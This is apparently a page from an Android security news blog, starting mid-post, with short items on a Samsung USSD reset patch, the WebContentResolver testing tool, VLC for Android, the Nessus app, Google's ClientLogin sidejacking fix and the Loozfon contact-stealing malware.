Samsung said in a statement that it has already provided a patch for the Galaxy S3, but it is not clear how long that will take for operator approval and rollout. In general software updates to any phone have to first be tested and approved by the carrier supporting the phone. Samsung said it is testing a patch for the Galaxy S2, but had no information on when it will be available or how it will be distributed. But HTC has issued a statement saying that "our devices do not support a USSD code to factory reset option." This means that they should not be vulnerable to the exploit described below.


-Source (Guardian)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Android Vulnerability Assessment Tool Named WebContentResolver

Posted by Avik Sarkar On 12/06/2011 01:52:00 pm



WebContentResolver is an open source, Android assessment tool which allows you to find Content-Provider vulnerabilities desinged by MWR InfoSecurity Labs. Though it still is an Alpha release, you can atleast start and report any bugs that are found. 

What is an Android Content-Provider? 
A Content-Provider is one of Androids IPC endpoints; it is commonly used to implement data storage in applications and to offer access to this data to other applications on the device. They store,  add, alter, delete and retrieve data and make it accessible to all applications. They’re the only way to share data across applications as there is no common storage area that all Android packages can access. Android ships with a default number of content providers for common data types, such as – audio, video, images, personal contact information, browser bookmarks, contacts list, etc. It basically is an interface that clients use indirectly, most generally through ContentResolver objects. Unfortunately, because of unsupervised use, these Content-Providers are vulnerable which allow third party applications or compromised applications to gain access to sensitive data. Commong vulnerabilities, such as directory traversal or SQL injection in providers installed as part of the Android system or by third party applications are regularly found on the Android platform. As these issues are similar to issues that are commonly found in web applications it would be desirable to test Content-Providers in the same way web applications are tested using Android WebContentResolver. This allows us to leverage the current skill set of web application tester and the currently available tool set for web application testing.
WebContentResolver runs on an Android device or emulator and will offer a web service interface to all installed Content-Providers. This not only allows a security tester to use a web browser to test for vulnerabilities, but also to leverage the power of current web application testing tools, such as sqlmap, to find and exploit vulnerabilities in Content-Providers.

To Download WebContentResolver Click Here

Install the WebContentResolver.apk to the phone or emulator under test. This will create its icon in the Launcher menu, which we use to execute. This by default starts a local web server listening on port 8080.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

VLC Media Player (Beta) for Android is Now Available

Posted by Avik Sarkar On 9/10/2011 10:41:00 am


VLC is a popular media player for Windows, Mac and Linux computers. It was one of the first apps that could support virtually any video codec, which means that as long as you’re trying to watch a video without DRM, you can probably use VLC.
The developers have been working on an Android port of VLC for a while, and now it looks like we’re one step closer to a release. VLC for Android is now in beta testing, and you can sign up to request an invitation to participate in the private beta. There’s a key difference between VLC for desktop computers and for Android though. Most Android phones and tablets have processors that support hardware acceleration for just a few video codecs. So while VLC may be able to decode videos that aren’t supported by your device’s chipset, it will have to use software to do that, and the performance will likely vary from device to device and video file to video file.
For instance, most recent Android devices have hardware support for H.264 video files, which means you can typically play 720p or even 1080p HD video in that format on some devices. But it’s much less common (although not impossible) to find a device that has hardware support for MKV or DiVX video files. VLC may let you watch movies in those formats anyway, but I wouldn’t expect HD videos to work well unless you have hardware support.
In other words, while it’s certainly pretty cool that VLC is set to become one of the first Swiss Army Knife video players that can run on Windows, Mac, Linux, and Android, I’d be surprised if it works much better than RockPlayer, MoboPlayer, or any of the other video players currently available for Android.

To download VLC for Android Click Here

-News Source (Video LAN & Mobiputing)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Tenable Network Security Released Nessus Android Application

Posted by Avik Sarkar On 6/07/2011 11:11:00 pm

“Network security isn’t a 9-5 job,” said Ron Gula, CEO of Tenable Network Security. “The ability to conduct vulnerability scans and review results anytime from anywhere is exactly what enterprise IT and security professionals expect from their software and service providers, and it’s what they need to keep their networks safe, 24/7.” Tenable is the first company to release an Android-based mobile application for vulnerability scanning. The Nessus Android application is available at no cost at the Android Marketplace and is located under the productivity category. It allows users to take advantage of the advanced capabilities of the Android user interface.Features of the Nessus Android application include remote starting, stopping and pausing of network scans as well as the ability to analyze scan results. Mobile access speeds the Incident Response process – allowing a security professional who is responding to an incident to quickly log into a Nessus scanner during a meeting to find a host with a given vulnerability.Tenable Network Security, Inc.the leader in Unified Security Monitoring (USM) and creator of the widely-used, award-winning  enterpriseSecurityCenter and Nessus® vulnerability scanner, today announced that it has released an Android application for its Nessus Vulnerability Scanner, enabling Nessus users to remotely connect to a Nessus server, launch scans and review reports from their Android devices.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Google Patches Sidejacking Vulnerability

Posted by Avik Sarkar On 5/26/2011 10:30:00 pm


Google has been rolling out a server-side patch for the ClientLogin authentication protocol vulnerability that affects 99.7% of Android smartphones.
"We recently started rolling out a fix which addresses a potential security flaw that could, under certain circumstances, allow a third party access to data available in calendar and contacts. This fix requires no action from users and will roll out globally over the next few days," said a Google spokesperson via email.

 Google's fix comes in response to a warning, published earlier this month by researchers at the University of Ulm in Germany, that Android devices could be exploited in a sidejacking-like attack. Just as website session cookies can be stolen (sidejacked), allowing attackers to impersonate a user, attackers could sniff data being sent to and from Android smartphones that are connected to unsecured Wi-Fi networks--by using a tool such as Wireshark--and capture tokens for any Google service that uses the ClientLogin authentication protocol. Applications that use this protocol include Google Calendar, Contacts, and Picasa, as well as third-party applications for Facebook and Twitter.
Android smartphone users running the latest OS, 2.3.4, were already protected against the vulnerability. But 99.7% of Android users are still on older operating systems.
Accordingly, Google's solution has been a server-side fix that forces Android devices to use HTTPS--to keep data encrypted--when syncing with the Google Contacts or Calendar, so that authentication credentials can't be intercepted. "The great news is that it doesn't require a software update on the Android devices themselves--meaning the fix is automatic and worldwide. Effectively this is a silent fix," said Graham Cluley, senior technology consultant at Sophos, in a blog post.
No attacks have been seen that exploit the vulnerability, and a fix is still in the works for Picasa. For now, Picasa users can mitigate the vulnerability by avoiding unsecured Wi-Fi networks, which would prevent their authentication credentials from being stolen.
Security-wise, Google's server-side patch is a crucial move because most cell phone carriers rarely push patches or OS updates to their customers. Because of that, some industry watchers had worried that Google would have difficulty securing older devices. For now, it's dodged that bullet, but in the future, major flaws could still pose a problem. "Concerns still remain as to how easy it would be to fix a serious security vulnerability on the Android devices themselves, given that Google is so reliant on manufacturers and carriers to push out OS updates," said Cluley.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Android Malware 'Loozfon' Targeting Female Android Users -Said Symantec

Posted by Avik Sarkar On 8/31/2012 06:05:00 pm

Android Malware 'Loozfon' Targeting Female Android Users -Said Symantec

We are very much familiar to see Malware has targeted men by enticing them to view videos or pictures of a sexually-oriented nature. But here the story is totally different, recently Antivirus firm Symantec has discovered discovered 'Android.Loozfon' a rare example of malware that targets female Android users.
According to the symantec official blog -A group of scammers is attempting to lure female Android users in Japan into downloading an app by sending emails stating how the recipient can easily make some money. The email includes a link to a site that appears to be designed to assist women to make money simply by sending emails. When a certain link on the site is clicked, Android.Loozfon is downloaded onto the device. Other links direct the user to a dating service site that likely attempts to charge money to use the service, which supposedly helps women meet rich men.



If this trick does not work, the criminal group has another trick up its sleeve. It also sends spam that states that the sender of the email can introduce the recipient to wealthy men. When the link included in the body of the email is clicked, the malware is automatically downloaded onto the device. The downloaded app is titled “Will you win?” in Japanese. It has nothing to do with earning extra income or wealthy men.

If the app is installed and launched, it counts down from two to zero and then states that the user has lost. The app is programmed to lose every time, although there is nothing to either lose or win. It steals contact details stored on the device as well as the phone number of the device, which is the main goal of the malware. The scammers are likely harvesting email addresses in order to send spam to the contacts they were able to steal to lure them to the dating service site and/or sell the data to another group of spammers.





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search